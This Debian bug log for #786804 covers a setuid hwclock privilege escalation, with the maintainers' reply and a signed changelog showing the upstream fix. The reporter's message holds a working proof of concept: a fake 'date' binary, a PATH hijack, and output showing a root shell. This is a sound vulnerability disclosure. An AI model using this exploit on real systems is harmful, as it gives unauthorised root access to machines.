Headline
CVE-2020-21583: #786804 - hwclock(8) SUID privilege escalation
An issue was discovered in hwclock.13-v2.27 allows attackers to gain escalated privlidges or execute arbitrary commands via the path parameter when setting the date.
Debian Bug report logs - #786804
hwclock(8) SUID privilege escalation
Toggle useless messages
Report forwarded to [email protected], Debian util-linux Maintainers [email protected]:
Bug#786804; Package util-linux. (Mon, 25 May 2015 18:27:06 GMT) (full text, mbox, link).
Acknowledgement sent to [email protected]:
New Bug report received and forwarded. Copy sent to Debian util-linux Maintainers [email protected]. (Mon, 25 May 2015 18:27:07 GMT) (full text, mbox, link).
Message #5 received at [email protected] (full text, mbox, reply):
Package: util-linux Version: 2.26.2
Actually, all versions of util-linux are affected.
Hello, Federico Bento here.
During a recent assessment I have stumbled across a system which had
hwclock(8) setuid root
$ man hwclock | sed -n ‘223,231p’
Users access and setuid
Sometimes, you need to install hwclock setuid root. If you
want users other than the superuser to be able to display the clock
value using the direct ISA I/O
method, install it setuid root. If you have the /dev/rtc
interface on your system or are on a non-ISA system, there’s probably
no need for users to use the
direct ISA I/O method, so don’t bother.
In any case, hwclock will not allow you to set anything unless
you have the superuser real uid. (This is restriction is not
necessary if you haven’t
installed setuid root, but it’s there for now).
http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041 http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920
“The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required).”
"program is designed to run setuid (in some situations)"
from util-linux/2.26.2-5/sys-utils/hwclock.c http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748
/* Quotes in date_opt would ruin the date command we construct. */ if (strchr(date_opt, ‘"’) != NULL) { warnx(_ (“The value of the --date option is not a valid date.\n” “In particular, it contains quotation marks.”)); return 12; }
sprintf(date\_command, "date --date=\\"%s\\" +seconds-into-epoch=%%s",
date\_opt);
\[...\]
date\_child\_fp = popen(date\_command, "r");
\[...\]
hwclock uses popen() to date_command which is ‘date --date=\"%s\"
+seconds-into-epoch=%%s’
Exploiting is trivial, since $PATH is user-controlled
$ ls -l /usr/sbin/hwclock -rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock $ cat > date.c;gcc date.c -o date main() { chown(“/tmp/sploit", 0, 0); chmod(“/tmp/sploit", 04755); } ^D $ cp /bin/sh /tmp/sploit $ PATH=".:$PATH” /usr/sbin/hwclock --set --date="05/23/2015 20:35:37” hwclock: The date command issued by hwclock returned unexpected results. The command was: date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s The response was:
hwclock: No usable set-to time. Cannot set clock. $ /tmp/sploit
id
euid=0(root) groups=0(root)
Notes:
Please note that this is possible on Debian-derived (and therefore
Ubuntu), because /bin/sh is provided by dash which does NOT make use
of privmode.
From a Tavis Ormandy’s blog post:
488 489 if (running_setuid && privileged_mode == 0) 490 disable_priv_mode (); 491
Where disable_priv_mode () is defined as:
1202 void 1203 disable_priv_mode () 1204 { 1205 setuid (current_user.uid); 1206 setgid (current_user.gid); 1207 current_user.euid = current_user.uid; 1208 current_user.egid = current_user.gid; 1209 }
On most modern Linux systems, /bin/sh is provided by bash.
As everyone who works in security quickly learns, bash will drop
privileges very early if ruid != euid unless -p switch is used.
This is surprisingly effective at mitigating some common vulnerability
classes and misconfigurations, and it has been around since mid 90’s.
Indeed, Chet Ramey (bash author and maintainer) explains that the
purpose of this is to prevent “bogus system(3)/popen(3) calls in
setuid executables”
TL;DR: When setuid root, hwclock relies on $PATH to popen() the date
command, meaning privilege escalation can occur since $PATH is
user-controlled.
This message was sent using IMP, the Internet Messaging Program.
Information forwarded to [email protected], Debian util-linux Maintainers [email protected]:
Bug#786804; Package util-linux. (Tue, 26 May 2015 09:57:04 GMT) (full text, mbox, link).
Acknowledgement sent to Andreas Henriksson [email protected]:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers [email protected]. (Tue, 26 May 2015 09:57:04 GMT) (full text, mbox, link).
Message #10 received at [email protected] (full text, mbox, reply):
Control: tags -1 + upstream fixed-upstream Control: forwarded -1 https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1
Hello Federico Bento!
Thanks for your detailed bug report.
On Mon, May 25, 2015 at 07:51:11PM +0200, [email protected] wrote:
Package: util-linux Version: 2.26.2
Actually, all versions of util-linux are affected.
Given that you didn’t specify a valid debian revision in the Version tag the bug tracking system is tracking it as affecting all versions. :)
[…]
During a recent assessment I have stumbled across a system which had hwclock(8) setuid root […]
To clarify for the records, hwclock is *not* shipped suid in Debian so this does not affect normal installs. Only if the admin manually modified the system (based on incorrect information in the manpage).
[…]
Exploiting is trivial, since $PATH is user-controlled […]
I’ve mentioned your bug report to upstream which quickly followed up with the following commit:
https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1
This will be part of future upstream v2.27 release (atleast).
This should hopefully address your concerns. Please followup if you spot any additional problems with the new upstream code and manpage instructions. For more direct interaction and less roundtrips feel free to contact upstream util-linux mailing list on vger.kernel.org directly.
Thanks again for your detailed bug report.
Regards, Andreas Henriksson
Added tag(s) upstream and fixed-upstream. Request was from Andreas Henriksson [email protected] to [email protected]. (Tue, 26 May 2015 09:57:05 GMT) (full text, mbox, link).
No longer marked as found in versions 2.26.2. Request was from Salvatore Bonaccorso [email protected] to [email protected]. (Tue, 26 May 2015 20:15:20 GMT) (full text, mbox, link).
Marked as found in versions util-linux/2.17.2-1. Request was from Salvatore Bonaccorso [email protected] to [email protected]. (Tue, 26 May 2015 20:15:21 GMT) (full text, mbox, link).
Reply sent to Andreas Henriksson [email protected]:
You have taken responsibility. (Fri, 31 Jul 2015 13:24:13 GMT) (full text, mbox, link).
Notification sent to [email protected]:
Bug acknowledged by developer. (Fri, 31 Jul 2015 13:24:13 GMT) (full text, mbox, link).
Message #23 received at [email protected] (full text, mbox, reply):
Source: util-linux Source-Version: 2.27~rc1-1
We believe that the bug you reported is fixed in the latest version of util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is attached.
Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software pp. Andreas Henriksson [email protected] (supplier of updated util-linux package)
(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Format: 1.8 Date: Fri, 31 Jul 2015 14:45:54 +0200 Source: util-linux Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb Architecture: source amd64 all Version: 2.27~rc1-1 Distribution: experimental Urgency: medium Maintainer: Debian util-linux Maintainers [email protected] Changed-By: Andreas Henriksson [email protected] Description: bsdutils - basic utilities from 4.4BSD-Lite fdisk-udeb - Manually partition a hard drive (fdisk) (udeb) libblkid-dev - block device id library - headers and static libraries libblkid1 - block device id library libblkid1-udeb - stripped down block device id library, for debian-installer (udeb) libfdisk-dev - fdisk partitioning library - headers and static libraries libfdisk1 - fdisk partitioning library libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb) libmount-dev - device mounting library - headers and static libraries libmount1 - device mounting library libsmartcols-dev - smart column output alignment library - headers and static librar libsmartcols1 - smart column output alignment library libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb) libuuid1 - Universally Unique ID library libuuid1-udeb - stripped down universally unique id library, for debian-installer (udeb) mount - Tools for mounting and manipulating filesystems util-linux - Miscellaneous system utilities util-linux-locales - Locales files for util-linux util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb) uuid-dev - universally unique id library - headers and static libraries uuid-runtime - runtime components for the Universally Unique ID library Closes: 786554 786759 786804 787763 789950 790875 Changes: util-linux (2.27~rc1-1) experimental; urgency=medium . * Imported Upstream version 2.27~rc1 - among other things includes these fixes: mkfs: drop hardcoded search path (Closes: #786759) man: fix nolazytime typo in mount(8) (Closes: #786554) unshare: add --propagation, use MS_PRIVATE by default (Closes: #787763) hwclock: don’t allow non-root access (Closes: #786804) sulogin: improve support for locked root account (Closes: #789950) (Please note that --force option is needed for sulogin with locked root!) logger: do not exit when socket errors are not enforced (Closes: #790875) * Update patch queue for 2.27 - dropped patches (now include in upstream release): 0002-lib-fileutils-Add-new-dup_fd_cloexec-function.patch 0003-lib-sysfs-Use-dup_fd_cloexec-instead-of-direct-call-.patch * Don’t use deprecated gbp commands in debian/README.source * Ship lslogins, lsipc and manpages in util-linux package * Update debian/*.symbols with newly added symbols Checksums-Sha1: f41e05cc62c9c6b03c9b57e1b2ec9309756acccb 3723 util-linux_2.27~rc1-1.dsc 478a38b435579957130dd466bcd228483026503c 3924600 util-linux_2.27~rc1.orig.tar.xz bc283373b32fc06fd3f1c43749ef2de66df49ae5 71076 util-linux_2.27~rc1-1.debian.tar.xz 44092162811392d1a428d5626303fcbd8cf6062b 103208 bsdutils_2.27~rc1-1_amd64.deb eedabe1f00f453323655e1eed1aa57ad380fca47 53698 fdisk-udeb_2.27~rc1-1_amd64.udeb fd276db99014ad6c978f1f8d1871e96e0e448c35 186162 libblkid-dev_2.27~rc1-1_amd64.deb f4da1a41706df05dfd841e9f7483a75c93d6c51a 102006 libblkid1-udeb_2.27~rc1-1_amd64.udeb 282aa572687e04b52ca06c4a8dafdd2c7f996640 161140 libblkid1_2.27~rc1-1_amd64.deb 7f0f5ece1bde7e4a151d37bbf662354ae5f10c11 212326 libfdisk-dev_2.27~rc1-1_amd64.deb f7706275cf3178b60b9636bf3fe6e6ed5604a293 133754 libfdisk1-udeb_2.27~rc1-1_amd64.udeb ee10430df5314affc9443185a8d02c42a93a6cec 193956 libfdisk1_2.27~rc1-1_amd64.deb 7cc902896fe5d15b18300e448064cdf86467573c 186650 libmount-dev_2.27~rc1-1_amd64.deb 5b216f138a16abe8e421a3f7618843a05a2915c4 169808 libmount1_2.27~rc1-1_amd64.deb cd75eebf0bbc5483aaf6d99b9c9b3e30b456f842 124582 libsmartcols-dev_2.27~rc1-1_amd64.deb 6eb3fa51f91cf7b1232a94e40f80b4cb053d94b2 55586 libsmartcols1-udeb_2.27~rc1-1_amd64.udeb b09349bacd2fb8be319d0575f626c01e4eb4d762 114936 libsmartcols1_2.27~rc1-1_amd64.deb 94976652e319cb6ab87413f2c7cb57f7f9f0ea62 7090 libuuid1-udeb_2.27~rc1-1_amd64.udeb 59dcc5fbf9f143239b18ad713d09e55f5a88a3ab 66776 libuuid1_2.27~rc1-1_amd64.deb 34ceacddfbff36c9e3375bb407596e981d71c49c 176648 mount_2.27~rc1-1_amd64.deb 106d119be481be71f5ca1da6d87ac750b4ae9ef4 847154 util-linux-locales_2.27~rc1-1_all.deb 2a32c7918b5796343314d0d5ee26a616cea7f6da 30718 util-linux-udeb_2.27~rc1-1_amd64.udeb 05d24333a5f708dafe99b9f7ea28891a732cbbd1 882860 util-linux_2.27~rc1-1_amd64.deb 34cc0057ae6b87013e9c06267bcd4751fbc65dcc 80506 uuid-dev_2.27~rc1-1_amd64.deb 39801e1c8604147b74bd61d80c2a5570a2474b2d 77406 uuid-runtime_2.27~rc1-1_amd64.deb Checksums-Sha256: d83a4ced7a1d725d5e78379d1fa0c7c0b5dc292f4b6259635154dd306c49dabf 3723 util-linux_2.27~rc1-1.dsc 67fde4052496ada16d6a5a2cd23691e2bfd93a4a379bfe300fffa4c5657df155 3924600 util-linux_2.27~rc1.orig.tar.xz 4ab916b43d8adfaa7e6d63469cb4a654b602eda42a70c2516e50625bc64578f7 71076 util-linux_2.27~rc1-1.debian.tar.xz 18871db3fc0830d6cbef82a292df81067d8ed250612036f85bbb599b4232facd 103208 bsdutils_2.27~rc1-1_amd64.deb 98e808f98ba4fe670f9f451c03baea82c9b77d77cde35e21a9668a304cb27e04 53698 fdisk-udeb_2.27~rc1-1_amd64.udeb 7a7008671ae5f436c63be5c6170eb9be62f7a607a655d148e63e63f3e14750de 186162 libblkid-dev_2.27~rc1-1_amd64.deb 2cf450ce0b417ccd03f5f39e1fe0f2e247b1745fd3fbbfabd249b06d27a7bf9c 102006 libblkid1-udeb_2.27~rc1-1_amd64.udeb 9e7bb23ade524011b614752fd78afd196a2d4ec69ad11f7bb5a6f6d357a7f38d 161140 libblkid1_2.27~rc1-1_amd64.deb f88f5daf1e49a4884378aba32e7de687f4b53c8e58af92bbff3ccdc4f75556bc 212326 libfdisk-dev_2.27~rc1-1_amd64.deb 8e385cead90490addc84e74b1e835ac486046631c8e5d9564495b41e8101d571 133754 libfdisk1-udeb_2.27~rc1-1_amd64.udeb d6a36dfbc6f0d4c5dd43de4fc6941258a3d0b089b6b5e4089145662f30157cb7 193956 libfdisk1_2.27~rc1-1_amd64.deb 31326f1746099703c36e4c7da9ee818ce48b7a2b8fed14841ce300d8838f8d72 186650 libmount-dev_2.27~rc1-1_amd64.deb b4f3d9334033455e07fde9c0b45173b6ca6f578a143f09e8d0a8f7509b5a3360 169808 libmount1_2.27~rc1-1_amd64.deb c0dc89da2843baaa6d645eb43d0c8b88c5f892c6e062dff6856eaa8aceee31bd 124582 libsmartcols-dev_2.27~rc1-1_amd64.deb 5db05016f43e8640f87145e1a228b9cea7ea0c74b507e53c18cbaee0611a2157 55586 libsmartcols1-udeb_2.27~rc1-1_amd64.udeb 6ccaefdf2f950e1af2153d5f7c69ab2e79fd679db5a06f48af43adca0bb73bf5 114936 libsmartcols1_2.27~rc1-1_amd64.deb 48f3e65e87970099d5a681aa58f2bf97670aa2eb9351620c8cc25bf0283d757a 7090 libuuid1-udeb_2.27~rc1-1_amd64.udeb ad3cd47e29a792c9b9ce1670d73dce42d929b4bf6ec04e6fb6610d65ee03f9b0 66776 libuuid1_2.27~rc1-1_amd64.deb c0afa0d5e337e9e2909c4e277bae04c04894b786f2238531159957c5e2fb3a6d 176648 mount_2.27~rc1-1_amd64.deb 189a91a61bf03b175728c324cfc872cee75565c1c7fd82916075a5e057caf936 847154 util-linux-locales_2.27~rc1-1_all.deb 82ad80fd0ef731e74a2f5cdec8d12129193bc9b32c0c915db665924d681bdf42 30718 util-linux-udeb_2.27~rc1-1_amd64.udeb 0f3f10df78f15998b9bd87cd6c960b7a42b31a683b8ebbe04c742c1918c2f64d 882860 util-linux_2.27~rc1-1_amd64.deb 81e503e2f9a6038c5116af2c92182d38b7f70283724b2da78e8db996fdc86df3 80506 uuid-dev_2.27~rc1-1_amd64.deb 40ce6600366f73d377e141b6c61c9a03e5b8fc1031951a882a9b6621f17e692a 77406 uuid-runtime_2.27~rc1-1_amd64.deb Files: 2833d2bcf6d232d0f359ec80529448a8 3723 base required util-linux_2.27~rc1-1.dsc 500b9de1acc3601a69d6a0b2310da471 3924600 base required util-linux_2.27~rc1.orig.tar.xz 200741c56a60e65cdf5a1bd7f2ba396a 71076 base required util-linux_2.27~rc1-1.debian.tar.xz 85b79e3da4ee7ea5125db3e6d3d0306b 103208 utils required bsdutils_2.27~rc1-1_amd64.deb 2046df3f7d197577db9178d814d88d6b 53698 debian-installer extra fdisk-udeb_2.27~rc1-1_amd64.udeb cf4d62df38d337be376d6eaab522afb9 186162 libdevel optional libblkid-dev_2.27~rc1-1_amd64.deb 0aaa5e076e0793c6ad80af7ef8365123 102006 debian-installer optional libblkid1-udeb_2.27~rc1-1_amd64.udeb fab8234ae398b4d3475fca3bc3fd8940 161140 libs required libblkid1_2.27~rc1-1_amd64.deb 5f4f86cfafcc3e74f5aa0dcbaa4a42cc 212326 libdevel optional libfdisk-dev_2.27~rc1-1_amd64.deb a96c4508ebb8737520125e38afbe5960 133754 debian-installer optional libfdisk1-udeb_2.27~rc1-1_amd64.udeb 74ce5c32fd2c4de11732ae5b8f1e1b5d 193956 libs required libfdisk1_2.27~rc1-1_amd64.deb 71b33b9f833157856abed8cf68e2d2dc 186650 libdevel optional libmount-dev_2.27~rc1-1_amd64.deb fcd9c4d69f4154a02b273de5a55bba18 169808 libs required libmount1_2.27~rc1-1_amd64.deb a5388cb3f6d74770f0fc30f876ccdf76 124582 libdevel optional libsmartcols-dev_2.27~rc1-1_amd64.deb 597d926f560c4721302f0fcb3ece9fdc 55586 debian-installer optional libsmartcols1-udeb_2.27~rc1-1_amd64.udeb 0228ceb9c8dd8be4e6c64f0f009381d2 114936 libs required libsmartcols1_2.27~rc1-1_amd64.deb a9834035c1901f09daae39367c97c01d 7090 debian-installer optional libuuid1-udeb_2.27~rc1-1_amd64.udeb 28bc1f7ddc4661a461182830d7c38000 66776 libs required libuuid1_2.27~rc1-1_amd64.deb e589a3abebeb6f8cfbb76d27f4fbacd6 176648 admin required mount_2.27~rc1-1_amd64.deb 720d40455a8899a069fa9e5db6298bdc 847154 localization optional util-linux-locales_2.27~rc1-1_all.deb c61a609d9f0ce0c0d310318bfaa32d75 30718 debian-installer optional util-linux-udeb_2.27~rc1-1_amd64.udeb be61bda7d1dd2b874fcdd316edac5501 882860 utils required util-linux_2.27~rc1-1_amd64.deb 4267e5eca5b516acf623b7c35f898758 80506 libdevel optional uuid-dev_2.27~rc1-1_amd64.deb 235b3260076daf73cd834ad98272c56a 77406 utils optional uuid-runtime_2.27~rc1-1_amd64.deb
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIcBAEBCgAGBQJVu3M5AAoJEAvEfcZNE1MGI+IP/23qSjISyHGym+KGV5cEDdPp F8jvjFHdB+wx2r9dCYA3hpBiKaPBxOO3OGKDqomd82Lg1BENksRsHWgh3lBhR/b+ 0vSkJM/BabHL+bsjo6P2/GYfbqwoSFEwokjec+xj7b7d33OZjnmrtv6Nra3a16eD Spvu2onJHIthqMIpbZ0fRVuC6QRMSQJqS76T4S0cW1gE6Au60KJv42S3izY/Ooj0 h2CKQx/zA8UnTTFR6SONuuq14pbcSo8JQZxSNqJhSYIEbIrsrOxljldFK9VesM8U 2O5WZP7+G+lN+PSQJ3k++L+aIZPkNPgBrFCerQ2YmNQZfkC7UAU11keIkgV2Y6Te T+7DCH+d61b/a1E4C/XymYWoie9onmuHXn1cUz4mTl/pEHyWPPOzOz/p1+bNh/Y1 76LkdmPrj/++076h1tyIJQeyGfFQYGPk2IqUihO+qPTgaudHzCX7MZAyVgROMYtz J+32gvehAUT0sfxdb3VTswUz0R++LFmwhTnYDCY6Wk/A6xMFK6nFnvA+IfYYZQeM XSUHtsbsUEeAu5r/+voy5CYzNhZVZdwrhs6Pqx9M0wUK0ZUh+XMwzjF6LFMKFOl8 XTNaHQt3wvvt5HjPur2SKdZHq20rqYHrIRKbE0ISzr+DXZI9cFQRusfCLUhAWKiS C/5R1d7aXZwsnxOfHQJ+ =kiur -----END PGP SIGNATURE-----
Bug archived. Request was from Debbugs Internal Request [email protected] to [email protected]. (Tue, 06 Oct 2015 07:25:48 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <[email protected]>. Last modified: Mon Aug 28 17:09:28 2023; Machine Name: buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.